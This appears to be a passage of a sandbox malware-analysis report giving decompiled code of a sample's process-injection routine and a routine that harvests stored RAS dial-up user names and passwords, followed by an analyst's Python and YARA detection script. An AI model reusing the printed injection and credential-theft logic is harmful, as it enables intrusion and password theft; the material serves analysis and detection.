                                    • Opcode Fuzzy Hash: e851e4a92d8badf89d07f2a4177f5b83356ef3185ba0f28d6caae7e2681b3e9d
                                    • Instruction Fuzzy Hash: EE412470A442099BDB00EBA5C942BEEB7F8EF48704F54407EF540F72D1DB7899058B69
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 76%
                                    			E0040AF08(void* __eax, void* __ecx, _Unknown_base(*)()* __edx) {
                                    				long _v20;
                                    				long _v24;
                                    				intOrPtr _v28;
                                    				void* _v32;
                                    				_Unknown_base(*)()* _v36;
                                    				void* _t18;
                                    				void* _t30;
                                    				struct HINSTANCE__* _t32;
                                    				void* _t35;
                                    				long _t36;
                                    				void* _t37;
                                    
                                    				_v32 = __ecx;
                                    				_v36 = __edx;
                                    				_t30 = __eax;
                                    				_v28 = 0;
                                    				_t32 = GetModuleHandleA(0);
                                    				_push(0);
                                    				_push(_t32);
                                    				asm("cdq");
                                    				_t18 =  *((intOrPtr*)(_t32 + 0x3c)) + _v20;
                                    				asm("adc edx, [esp+0x4]");
                                    				_t36 =  *(_t18 + 0x50);
                                    				_t35 =  *(_t18 + 0x34);
                                    				VirtualFreeEx(_t30, _t35, 0, 0x8000);
                                    				_t37 = VirtualAllocEx(_t30, _t35, _t36, 0x3000, 0x40);
                                    				if(_t37 != 0) {
                                    					WriteProcessMemory(_t30, _t35, GetModuleHandleA(0), _t36,  &_v24);
                                    					if(_t36 <= _v24) {
                                    						CreateRemoteThread(_t30, 0, 0, _v36, _v32, 0,  &_v20);
                                    						CloseHandle(_t30);
                                    						_v32 = _t37;
                                    					}
                                    				}
                                    				return _v28;
                                    			}
                                    0x0040af0f
                                    0x0040af13
                                    0x0040af16
                                    0x0040af1a
                                    0x0040af25
                                    0x0040af2b
                                    0x0040af2c
                                    0x0040af30
                                    0x0040af31
                                    0x0040af34
                                    0x0040af3b
                                    0x0040af3e
                                    0x0040af4a
                                    0x0040af5e
                                    0x0040af62
                                    0x0040af74
                                    0x0040af7d
                                    0x0040af95
                                    0x0040af9b
                                    0x0040afa0
                                    0x0040afa0
                                    0x0040af7d
                                    0x0040afaf

                                    APIs
                                    • GetModuleHandleA.KERNEL32(00000000), ref: 0040AF20
                                    • VirtualFreeEx.KERNEL32(00000000,?,00000000,00008000,?,00000000), ref: 0040AF4A
                                    • VirtualAllocEx.KERNEL32(00000000,?,?,00003000,00000040,00000000,?,00000000,00008000,?,00000000), ref: 0040AF59
                                    • GetModuleHandleA.KERNEL32(00000000,?,?,00000000,?,?,00003000,00000040,00000000,?,00000000,00008000,?,00000000), ref: 0040AF6C
                                    • WriteProcessMemory.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,00003000,00000040,00000000,?,00000000,00008000), ref: 0040AF74
                                    • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,?,00000000,00000000), ref: 0040AF95
                                    • CloseHandle.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,?,00000000,00000000,?,?,00000000,?), ref: 0040AF9B
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.544831654.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000005.00000002.544817764.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000005.00000002.544862251.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000005.00000002.544888619.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000005.00000002.544945916.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000005.00000002.544973019.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: Handle$ModuleVirtual$AllocCloseCreateFreeMemoryProcessRemoteThreadWrite
                                    • String ID:
                                    • API String ID: 2398686212-0
                                    • Opcode ID: 94c8698d38da8039340599384be28bab159c0d8f4d27272cb75147a051b3407f
                                    • Instruction ID: ba714f15e26322d81a3db079e442bf4d00767b5fd8d80c8da630a050ea91888e
                                    • Opcode Fuzzy Hash: 94c8698d38da8039340599384be28bab159c0d8f4d27272cb75147a051b3407f
                                    • Instruction Fuzzy Hash: D71142B12443007FD210EE698C46F2BBBDCDFC5715F44882EB658E72D1D674E904876A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E00404E10() {
                                    
                                    				if( *0x40e944 == 0) {
                                    					 *0x40e944 = GetModuleHandleA("kernel32.dll");
                                    					if( *0x40e944 != 0) {
                                    						 *0x40e948 = GetProcAddress( *0x40e944, "CreateToolhelp32Snapshot");
                                    						 *0x40e94c = GetProcAddress( *0x40e944, "Heap32ListFirst");
                                    						 *0x40e950 = GetProcAddress( *0x40e944, "Heap32ListNext");
                                    						 *0x40e954 = GetProcAddress( *0x40e944, "Heap32First");
                                    						 *0x40e958 = GetProcAddress( *0x40e944, "Heap32Next");
                                    						 *0x40e95c = GetProcAddress( *0x40e944, "Toolhelp32ReadProcessMemory");
                                    						 *0x40e960 = GetProcAddress( *0x40e944, "Process32First");
                                    						 *0x40e964 = GetProcAddress( *0x40e944, "Process32Next");
                                    						 *0x40e968 = GetProcAddress( *0x40e944, "Process32FirstW");
                                    						 *0x40e96c = GetProcAddress( *0x40e944, "Process32NextW");
                                    						 *0x40e970 = GetProcAddress( *0x40e944, "Thread32First");
                                    						 *0x40e974 = GetProcAddress( *0x40e944, "Thread32Next");
                                    						 *0x40e978 = GetProcAddress( *0x40e944, "Module32First");
                                    						 *0x40e97c = GetProcAddress( *0x40e944, "Module32Next");
                                    						 *0x40e980 = GetProcAddress( *0x40e944, "Module32FirstW");
                                    						 *0x40e984 = GetProcAddress( *0x40e944, "Module32NextW");
                                    					}
                                    				}
                                    				if( *0x40e944 == 0 ||  *0x40e948 == 0) {
                                    					return 0;
                                    				} else {
                                    					return 1;
                                    				}
                                    			}



                                    Instruction addresses 0x00404e19-0x00404f69 (disassembly address column; the instruction text was not preserved)

                                    APIs
                                    • GetModuleHandleA.KERNEL32(kernel32.dll,00000002,00405097,?,00000000,0040520D,00000000,004052C4), ref: 00404E24
                                    • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00404E3C
                                    • GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 00404E4E
                                    • GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 00404E60
                                    • GetProcAddress.KERNEL32(00000000,Heap32First), ref: 00404E72
                                    • GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 00404E84
                                    • GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 00404E96
                                    • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00404EA8
                                    • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 00404EBA
                                    • GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 00404ECC
                                    • GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 00404EDE
                                    • GetProcAddress.KERNEL32(00000000,Thread32First), ref: 00404EF0
                                    • GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 00404F02
                                    • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00404F14
                                    • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00404F26
                                    • GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 00404F38
                                    • GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 00404F4A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.544831654.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000005.00000002.544817764.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000005.00000002.544862251.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000005.00000002.544888619.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000005.00000002.544945916.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000005.00000002.544973019.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: AddressProc$HandleModule
                                    • String ID: CreateToolhelp32Snapshot$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Module32First$Module32FirstW$Module32Next$Module32NextW$Process32First$Process32FirstW$Process32Next$Process32NextW$Thread32First$Thread32Next$Toolhelp32ReadProcessMemory$kernel32.dll
                                    • API String ID: 667068680-597814768
                                    • Opcode ID: ba10ce1c238db4b831d24003e7457fdab4bee255a78ea434dca1328541456aef
                                    • Instruction ID: fe5771f8beb9365a204d6e2904ce85914b9e0a1e64c90e6c75949bdee210121a
                                    • Opcode Fuzzy Hash: ba10ce1c238db4b831d24003e7457fdab4bee255a78ea434dca1328541456aef
                                    • Instruction Fuzzy Hash: D531D7F0A01710ABEB60AFB69986A2A3BA8EB857057140D77B100FF2D5C67D8D508B5D
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 76%
                                    			E0040822C(void* __eax, void* __ebx, void* __ecx, signed int __edx, void* __edi, void* __esi, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, signed int _a82) {
                                    				intOrPtr _v4;
                                    				signed int _v8;
                                    				signed int _v12;
                                    				signed int _v16;
                                    				signed int _v20;
                                    				signed int _v24;
                                    				signed int _v28;
                                    				signed int _v32;
                                    				char _v36;
                                    				signed int _v40;
                                    				signed int _v44;
                                    				signed int _v48;
                                    				signed int _v52;
                                    				signed int _v56;
                                    				struct _OSVERSIONINFOA _v200;
                                    				char _v476;
                                    				char _v733;
                                    				char _v1248;
                                    				char _v1252;
                                    				signed int _v3020;
                                    				signed int _v3024;
                                    				signed int _v3028;
                                    				signed int _v3032;
                                    				signed int _v3036;
                                    				char _v3284;
                                    				char _v3288;
                                    				char _v3292;
                                    				signed int _v3296;
                                    				signed int _v3300;
                                    				intOrPtr* _t114;
                                    				void* _t131;
                                    
                                    				_push(__ebx);
                                    				_push(__edx | _a82);
                                    				asm("popad");
                                    				// This branch is the body of the neighbouring thunk E004081BC (the address column lists
                                    				// 0x004081c8-0x004081ef here), which the decompiler merged into this function. It binds
                                    				// RasGetEntryProperties by name at run time and calls through the returned pointer, so the
                                    				// API never shows up in the import table.
                                    				if(__ecx + 1 < 0) {
                                    					_t131 = __eax;
                                    					_t114 = E0040806C("RasGetEntryProperties", __ebx, __eax);
                                    					return  *_t114(_t131, __edi, _v4, _a16, _a12, _a8);
                                    				} else {
                                    					_push(__ebp);
                                    					__ebp = __esp;
                                    					__esp = __esp + 0xfffff328;
                                    					_push(__ebx);
                                    					_push(__esi);
                                    					_push(__edi);
                                    					__edx = 0;
                                    					_v3296 = 0;
                                    					_v3300 = 0;
                                    					_v3036 = 0;
                                    					_v3032 = 0;
                                    					_v32 = 0;
                                    					_v36 = 0;
                                    					_v40 = 0;
                                    					_v48 = 0;
                                    					_v52 = 0;
                                    					_v56 = 0;
                                    					_v16 = __eax;
                                    					__eax = 0;
                                    					_push(__ebp);
                                    					_push(0x40861b);
                                    					_push( *[fs:eax]);
                                    					 *[fs:eax] = __esp;
                                    					_v16 = E00401AC0(_v16);
                                    					_v28 = E00407FF0();
                                    					__eflags = _v28;
                                    					if(_v28 != 0) {
                                    						__eax = _v20;
                                    						_push(_v20);
                                    						__eax =  &_v24;
                                    						__ecx = 1;
                                    						__edx =  *0x408214; // 0x408218
                                    						__eax = E00402FBC();
                                    						__esp = __esp + 4;
                                    						__edx = _v24;
                                    						// 0x108 == sizeof(RASENTRYNAMEA): dwSize is written into the first slot and the buffer
                                    						// is sized for _v20 entries. The call below receives (0, 0, buffer, &cb, &count), which
                                    						// is the argument order of RasEnumEntriesA; L00407B84 is left unnamed by the decompiler.
                                    						__eax = 0x108;
                                    						 *_v24 = 0x108;
                                    						__edx = 0x108 * _v20 >> 0x20;
                                    						__eax = 0x108 * _v20;
                                    						_v12 = 0x108 * _v20;
                                    						__eax =  &_v20;
                                    						_push( &_v20);
                                    						__eax =  &_v12;
                                    						_push( &_v12);
                                    						__eax = _v24;
                                    						_push(__eax);
                                    						_push(0);
                                    						_push(0);
                                    						L00407B84();
                                    						__eflags = __eax;
                                    						if(__eax == 0) {
                                    							// 0x94 == sizeof(OSVERSIONINFOA). dwPlatformId == 2 (VER_PLATFORM_WIN32_NT) together
                                    							// with dwMajorVersion >= 5 selects the Windows 2000+ phonebook handling below.
                                    							_v200.dwOSVersionInfoSize = 0x94;
                                    							 &_v200 = GetVersionExA( &_v200);
                                    							__eax =  &_v28;
                                    							__edx = 0x105;
                                    							__eax = E00402074( &_v28, 0x105);
                                    							__eax =  &_v32;
                                    							__edx = 0x105;
                                    							__eax = E00402074( &_v32, 0x105);
                                    							__eflags = _v200.dwPlatformId - 2;
                                    							if(_v200.dwPlatformId == 2) {
                                    								__eflags = _v200.dwMajorVersion - 5;
                                    								if(_v200.dwMajorVersion >= 5) {
                                    									// Arguments (0, buf, 0x1a, 0) fit SHGetSpecialFolderPathA(NULL, buf, CSIDL_APPDATA, FALSE);
                                    									// the second call below uses 0x23 == CSIDL_COMMON_APPDATA. These are the per-user and
                                    									// all-users locations of RAS phonebook (.pbk) files on NT 5+. L00407B7C is not named by
                                    									// the decompiler; the identification rests on the argument pattern.
                                    									_push(0);
                                    									_push(0x1a);
                                    									__eax =  &_v28;
                                    									__eax = E00401F9C( &_v28);
                                    									_push(__eax);
                                    									_push(0);
                                    									L00407B7C();
                                    									__eflags = __eax;
                                    									if(__eflags != 0) {
                                    										__edx =  &_v3024;
                                    										_v28 = E00407F4C(_v28,  &_v3024, __eflags);
                                    										__edx = _v3024;
                                    										 &_v28 = E00401B58( &_v28, _v3024);
                                    									}
                                    									_push(0);
                                    									_push(0x23);
                                    									__eax =  &_v32;
                                    									__eax = E00401F9C( &_v32);
                                    									_push(__eax);
                                    									_push(0);
                                    									L00407B7C();
                                    									__eflags = __eax;
                                    									if(__eflags != 0) {
                                    										__edx =  &_v3028;
                                    										_v32 = E00407F4C(_v32,  &_v3028, __eflags);
                                    										__edx = _v3028;
                                    										 &_v32 = E00401B58( &_v32, _v3028);
                                    									}
                                    									__eax = E00407E40(__ebx, __ecx, __edi, __esi, __eflags);
                                    								}
                                    							}
                                    							_v36 = 0xffffffff;
                                    							__eax = _v20;
                                    							__eax = _v20 - 1;
                                    							__eflags = __eax;
                                    							if(__eax >= 0) {
                                    								_v52 = __eax;
                                    								__esi = 0;
                                    								__eflags = 0;
                                    								do {
                                    									// 0x41c == sizeof(RASDIALPARAMSA); _v1252 is dwSize at the structure start, so _v1248 (+4)
                                    									// is szEntryName, _v733 (+519) is szUserName and _v476 (+776) is szPassword.
                                    									_v1252 = 0x41c;
                                    									__esi = __esi << 5;
                                    									__ebx = (__esi << 5) + __esi;
                                    									__eax = _v24;
                                    									__eax = _v24 + 4 + __ebx * 8;
                                    									__edx =  &_v1248;
                                    									__ecx = 0x100;
                                    									// Copy up to 0x100 bytes of the enumerated entry name into szEntryName, then call
                                    									// L00407B8C(0, &params, &_v36): the argument pattern of RasGetEntryDialParamsA(NULL,
                                    									// &params, &fPassword), which fills in the stored user name and password for the entry.
                                    									E00401258(_v24 + 4 + __ebx * 8, 0x100,  &_v1248) =  &_v36;
                                    									_push( &_v36);
                                    									__eax =  &_v1252;
                                    									_push( &_v1252);
                                    									_push(0);
                                    									L00407B8C();
                                    									// 0x6e8 is the dwSize given to the RASENTRY buffer (_v3020) that is handed, together with
                                    									// the entry name, to the E004081BC thunk (RasGetEntryProperties) in the call below.
                                    									_v12 = 0x6e8;
                                    									__eax =  &_v3020;
                                    									__ecx = 0;
                                    									__edx = _v12;
                                    									E00401414( &_v3020, _v12) = _v12;
                                    									_v3020 = _v12;
                                    									 &_v12 =  &_v16;
                                    									__eax = _v24;
                                    									__edx = _v24 + 4 + __ebx * 8;
                                    									__ecx =  &_v3020;
                                    									0 = E004081BC(0, _v24 + 4 + __ebx * 8,  &_v16, 0,  &_v12);
                                    									__eflags = _v200.dwPlatformId - 2;
                                    									if(_v200.dwPlatformId == 2) {
                                    										__eflags = _v200.dwMajorVersion - 5;
                                    										if(_v200.dwMajorVersion >= 5) {
                                    											__eax = _v28;
                                    											__eflags =  *_v28;
                                    											if( *_v28 != 0) {
                                    												L17:
                                    												__eax =  &_v40;
                                    												__edx =  &_v1248;
                                    												__eax = E00401CAC( &_v40,  &_v1248);
                                    												__edx =  &_v44;
                                    												_v40 = E00403268(_v40, __ebx, __ecx,  &_v44, __esi, __eflags);
                                    												 &_v28 = E00401F9C( &_v28);
                                    												__eax = _v40;
                                    												__eax = E00401F48(_v40);
                                    												__edi = __eax;
                                    												__ebx = __eax;
                                    												__eflags = __ebx;
                                    												if(__ebx == 0) {
                                    													__eax =  &_v32;
                                    													__eax = E00401F9C( &_v32);
                                    													__ebx = __eax;
                                    												}
                                    												__eflags = __ebx;
                                    												if(__ebx == 0) {
                                    													 &_v28 = E00401F9C( &_v28);
                                    													__eax = _v44;
                                    													__eax = E00401F48(_v44);
                                    													__ebx = __eax;
                                    												}
                                    												__eflags = __ebx;
                                    												if(__ebx == 0) {
                                    													 &_v32 = E00401F9C( &_v32);
                                    													__eax = _v44;
                                    													__eax = E00401F48(_v44);
                                    													__ebx = __eax;
                                    												}
                                    												__eflags = __ebx;
                                    												if(__ebx > 0) {
                                    													__eax = __ebx;
                                    													__edx = 0;
                                    													__eflags = 0;
                                    													 &_v3284 = E00402BC0( &_v3284, __ebx, 0);
                                    													__edx =  &_v3284;
                                    													 &_v48 = E00401D18( &_v48,  &_v3284, __eflags);
                                    													__edi = 0x100;
                                    													__ebx = 0x40e9bc;
                                    													do {
                                    														__eax =  *__ebx;
                                    														__edx = _v48;
                                    														__eax = E00401E94( *__ebx, _v48);
                                    														if(__eflags == 0) {
                                    															__eflags =  *(__ebx + 4);
                                    															if( *(__ebx + 4) != 0) {
                                    																_t92 = __ebx + 4; // 0x0
                                    																__eax =  *_t92;
                                    																_push(E00401D50( *_t92));
                                    																_t93 = __ebx + 4; // 0x0
                                    																__eax =  *_t93;
                                    																__edx = E00401F48( *_t93);
                                    																__eax =  &_v476;
                                    																_pop(__ecx);
                                    																__eax = E00408038( &_v476, __ecx, __edx);
                                    															}
                                    														}
                                    														__ebx = __ebx + 8;
                                    														__edi = __edi - 1;
                                    														__eflags = __edi;
                                    													} while (__edi != 0);
                                    												}
                                    											} else {
                                    												__eax = _v32;
                                    												__eflags =  *_v32;
                                    												if( *_v32 != 0) {
                                    													goto L17;
                                    												}
                                    											}
                                    										}
                                    									}
                                    									// `&_v733 != 0` and `&_v476 != 0` are decompiler artefacts (the address of a local is never 0);
                                    									// the real test is that szUserName and szPassword are non-empty. The seven pieces pushed below
                                    									// are concatenated by E00401E10 (count in edx) onto the result string _v8: the existing text,
                                    									// "RAS Passwords |", the user name, the unnamed constant at 0x40865c, the password, that
                                    									// constant again, and the unnamed constant at 0x408668.
                                    									__eax =  &_v733;
                                    									__eflags =  &_v733;
                                    									if( &_v733 != 0) {
                                    										__eax =  &_v476;
                                    										__eflags =  &_v476;
                                    										if( &_v476 != 0) {
                                    											__eax = _v8;
                                    											_push( *_v8);
                                    											_push("RAS Passwords |");
                                    											__eax =  &_v3288;
                                    											__edx =  &_v733;
                                    											__eax = E00401CAC( &_v3288,  &_v733);
                                    											_push(_v3288);
                                    											_push(0x40865c);
                                    											__eax =  &_v3292;
                                    											__edx =  &_v476;
                                    											__eax = E00401CAC( &_v3292,  &_v476);
                                    											_push(_v3292);
                                    											_push(0x40865c);
                                    											_push(0x408668);
                                    											__eax = _v8;
                                    											__edx = 7;
                                    											E00401E10();
                                    										}
                                    									}
                                    									__esi = __esi + 1;
                                    									_t105 =  &_v52;
                                    									 *_t105 = _v52 - 1;
                                    									__eflags =  *_t105;
                                    								} while ( *_t105 != 0);
                                    							}
                                    						}
                                    					}
                                    					__eax = 0;
                                    					__eflags = 0;
                                    					_pop(__edx);
                                    					_pop(__ecx);
                                    					_pop(__ecx);
                                    					 *[fs:eax] = __edx;
                                    					_push(E00408622);
                                    					__eax =  &_v3292;
                                    					__edx = 2;
                                    					__eax = E00401AE4( &_v3292, 2);
                                    					__eax =  &_v3028;
                                    					__edx = 2;
                                    					__eax = E00401AE4( &_v3028, 2);
                                    					__eax =  &_v48;
                                    					__edx = 3;
                                    					__eax = E00401AE4( &_v48, 3);
                                    					__eax =  &_v32;
                                    					__edx = 2;
                                    					__eax = E00401AE4( &_v32, 2);
                                    					__eax =  &_v24;
                                    					__edx =  *0x408214; // 0x408218
                                    					return E00402FC8( &_v24, __edx);
                                    				}
                                    			}
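                                    Added analyst example (not part of the Joe Sandbox report and not code from the sample): the two routines above yield a usable string set. The first resolves sixteen Toolhelp32 exports from kernel32 by name; the second binds RasGetEntryProperties by name, walks its RasEnumEntries buffer in 0x108-byte slots and labels its output "RAS Passwords |". The Python below turns that into a hunting check for raw memory dumps or unpacked images. It requires the NUL terminator on API names (so Process32First is not counted inside Process32FirstW), scores the Toolhelp32 set only as a weak signal because the same resolution stub appears in any Delphi program using TlHelp32, carves RASENTRYNAME arrays left in memory the way the harvester walks them, and emits an equivalent YARA rule. The sample bytes are constructed for the example; the rule name, the function names and the threshold of 12 resolved Toolhelp32 names are the author's assumptions, not values from the report.

```python
import struct

# Toolhelp32 names the first routine resolves one by one with GetProcAddress.
# The list and order are those of the Delphi TlHelp32 unit's InitToolHelp stub,
# so on their own they are a weak signal; they only distinguish "binds
# Toolhelp32 at run time" from "no match".
TOOLHELP32_NAMES = [
    b"CreateToolhelp32Snapshot", b"Heap32ListFirst", b"Heap32ListNext",
    b"Heap32First", b"Heap32Next", b"Toolhelp32ReadProcessMemory",
    b"Process32First", b"Process32Next", b"Process32FirstW", b"Process32NextW",
    b"Thread32First", b"Thread32Next", b"Module32First", b"Module32Next",
    b"Module32FirstW", b"Module32NextW",
]

# Observables specific to the RAS harvester routine.
RAS_API = b"RasGetEntryProperties"   # bound by name at run time, never imported
RAS_MARKER = b"RAS Passwords |"      # prefix of the harvested output line

# Layout the harvester hard-codes when walking its RasEnumEntries buffer:
# one slot per entry, dwSize (0x108) then the entry name, 0x100 bytes copied.
RASENTRYNAME_SIZE = 0x108
RASENTRYNAME_NAME_OFFSET = 4
RASENTRYNAME_NAME_LEN = 0x100
TOOLHELP32_THRESHOLD = 12            # assumption for this example, not from the report


def find_cstrings(blob, names):
    """Return the names present as NUL-terminated ANSI strings.

    The terminator matters: without it "Process32First" also matches inside
    "Process32FirstW" and the count is inflated."""
    return [n for n in names if n + b"\x00" in blob]


def classify(blob):
    """Classify a blob (dump, section, unpacked image) by the string set above."""
    toolhelp = find_cstrings(blob, TOOLHELP32_NAMES)
    ras_api = RAS_API + b"\x00" in blob
    marker = RAS_MARKER in blob
    if ras_api and marker:
        verdict = "ras_credential_harvester"
    elif len(toolhelp) >= TOOLHELP32_THRESHOLD:
        verdict = "runtime_toolhelp32_binding"  # weak: any Delphi TlHelp32 user
    else:
        verdict = "no_match"
    return {"verdict": verdict, "toolhelp32": len(toolhelp),
            "ras_api": ras_api, "marker": marker}


def carve_rasentryname_array(blob):
    """Recover entry names from a RasEnumEntries result buffer left in memory.

    Walks the buffer exactly as the harvester's loop does (stride 0x108, name
    at +4) and returns the longest run of consecutive slots whose dwSize is
    0x108."""
    tag = struct.pack("<I", RASENTRYNAME_SIZE)
    best = []
    pos = blob.find(tag)
    while pos != -1:
        names, off = [], pos
        while (blob[off:off + 4] == tag
               and off + RASENTRYNAME_SIZE <= len(blob)):
            start = off + RASENTRYNAME_NAME_OFFSET
            raw = blob[start:start + RASENTRYNAME_NAME_LEN]
            names.append(raw.split(b"\x00", 1)[0].decode("latin-1"))
            off += RASENTRYNAME_SIZE
        if len(names) > len(best):
            best = names
        pos = blob.find(tag, pos + 1)
    return best


def yara_rule():
    """Equivalent YARA hunting rule for the harvester routine (rule name is an assumption)."""
    return (
        "rule RAS_Password_Harvester_Routine\n{\n"
        "    strings:\n"
        "        $ras_api = \"RasGetEntryProperties\" ascii fullword\n"
        "        $marker  = \"RAS Passwords |\" ascii\n"
        "    condition:\n"
        "        $ras_api and $marker\n}\n"
    )


def constructed_sample():
    """Synthetic stand-in for an unpacked image plus a leftover RAS buffer.
    These bytes are constructed for the example; they are not from the sample."""
    blob = b"".join(n + b"\x00" for n in TOOLHELP32_NAMES)
    blob += b"kernel32.dll\x00" + RAS_API + b"\x00" + RAS_MARKER + b"\x00"
    for name in (b"Office VPN", b"Dialup ISP"):
        blob += struct.pack("<I", RASENTRYNAME_SIZE)
        blob += name.ljust(RASENTRYNAME_SIZE - RASENTRYNAME_NAME_OFFSET, b"\x00")
    return blob


if __name__ == "__main__":
    sample = constructed_sample()
    print(classify(sample))
    print(carve_rasentryname_array(sample))
    print(yara_rule())
```

                                    Run it over a process dump of the injected explorer.exe or over the unpacked 0x401000 region listed under Memory Dump Source; on a dump taken after the routine ran, carve_rasentryname_array also gives back the entry names the harvester enumerated, since the 0x108-slot buffer stays on the heap until the function's cleanup frees it.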

                                    Instruction addresses 0x00408230-0x00408548 (disassembly address column; the instruction text was not preserved). Three entries, 0x004081c8, 0x004081cf and 0x004081ef, lie outside this function and belong to the thunk E004081BC that the decompiler merged into the listing above.
                                    0x0040852c
                                    0x0040854d
                                    0x00408550
                                    0x00408550
                                    0x00408550
                                    0x0040851c
                                    0x00408444
                                    0x00408444
                                    0x00408447
                                    0x0040844a
                                    0x00000000
                                    0x00000000
                                    0x0040844a
                                    0x00408442
                                    0x00408436
                                    0x00408553
                                    0x00408559
                                    0x0040855b
                                    0x0040855d
                                    0x00408563
                                    0x00408565
                                    0x00408567
                                    0x0040856a
                                    0x0040856c
                                    0x00408571
                                    0x00408577
                                    0x0040857d
                                    0x00408582
                                    0x00408588
                                    0x0040858d
                                    0x00408593
                                    0x00408599
                                    0x0040859e
                                    0x004085a4
                                    0x004085a9
                                    0x004085ae
                                    0x004085b1
                                    0x004085b6
                                    0x004085b6
                                    0x00408565
                                    0x004085bb
                                    0x004085bc
                                    0x004085bc
                                    0x004085bc
                                    0x004085bc
                                    0x004083aa
                                    0x0040839e
                                    0x004082dc
                                    0x004085c5
                                    0x004085c5
                                    0x004085c7
                                    0x004085c8
                                    0x004085c9
                                    0x004085ca
                                    0x004085cd
                                    0x004085d2
                                    0x004085d8
                                    0x004085dd
                                    0x004085e2
                                    0x004085e8
                                    0x004085ed
                                    0x004085f2
                                    0x004085f5
                                    0x004085fa
                                    0x004085ff
                                    0x00408602
                                    0x00408607
                                    0x0040860c
                                    0x0040860f
                                    0x0040861a
                                    0x0040861a

                                    APIs
                                      • Part of subcall function 00407FF0: RasEnumEntriesA.RASAPI32(00000000,00000000,?,?,?), ref: 00408017
                                    • RasEnumEntriesA.RASAPI32(00000000,00000000,?,?,?), ref: 004082D5
                                    • GetVersionExA.KERNEL32(00000094), ref: 004082F3
                                    • SHGetSpecialFolderPathA.SHELL32(00000000,00000000,0000001A,00000000,00000094), ref: 00408333
                                    • SHGetSpecialFolderPathA.SHELL32(00000000,00000000,00000023,00000000,00000000,00000000,0000001A,00000000,00000094), ref: 00408367
                                      • Part of subcall function 00407F4C: lstrlen.KERNEL32(00000000,?,?,0040837E,00000000,00000000,00000023,00000000,00000000,00000000,0000001A,00000000,00000094), ref: 00407F68
                                    • RasGetEntryDialParamsA.RASAPI32(00000000,0000041C,FFFFFFFF), ref: 004083DF
                                    • GetPrivateProfileIntA.KERNEL32(00000000,DialParamsUID,00000000,00000000), ref: 00408484
                                    • GetPrivateProfileIntA.KERNEL32(00000000,DialParamsUID,00000000,00000000), ref: 004084A0
                                    • GetPrivateProfileIntA.KERNEL32(00000000,DialParamsUID,00000000,00000000), ref: 004084C4
                                    • GetPrivateProfileIntA.KERNEL32(00000000,DialParamsUID,00000000,00000000), ref: 004084E8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.544831654.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000005.00000002.544817764.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000005.00000002.544862251.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000005.00000002.544888619.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000005.00000002.544945916.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000005.00000002.544973019.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: PrivateProfile$EntriesEnumFolderPathSpecial$DialEntryParamsVersionlstrlen
                                    • String ID: DialParamsUID$RAS Passwords |$RasGetEntryProperties
                                    • API String ID: 606077693-541967613
                                    • Opcode ID: 1ab6e728647767d20885926d8c5f550152f1a8eb9b5063f4c77c40aaee44733b
                                    • Instruction ID: 6468358b1ab4b7f73c56054985f5742c7a8c8687d669c1df658abded6e8fa1dc
                                    • Opcode Fuzzy Hash: 1ab6e728647767d20885926d8c5f550152f1a8eb9b5063f4c77c40aaee44733b
                                    • Instruction Fuzzy Hash: 88C10F70A002199FDB10EBA5CD81BDEB7B9EF44308F1045BBE544B72D1DB78AE458B68
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 69%
                                    			E00408238(intOrPtr* __eax, void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                    				intOrPtr* _v8;
                                    				signed int _v12;
                                    				char _v16;
                                    				signed int _v20;
                                    				char _v24;
                                    				char _v28;
                                    				char _v32;
                                    				char _v36;
                                    				char _v40;
                                    				char _v44;
                                    				char _v48;
                                    				char _v52;
                                    				struct _OSVERSIONINFOA _v200;
                                    				char _v476;
                                    				char _v733;
                                    				char _v1248;
                                    				char _v1252;
                                    				signed int _v3020;
                                    				char _v3024;
                                    				char _v3028;
                                    				char _v3284;
                                    				char _v3288;
                                    				char _v3292;
                                    				char _t130;
                                    				void* _t138;
                                    				CHAR* _t167;
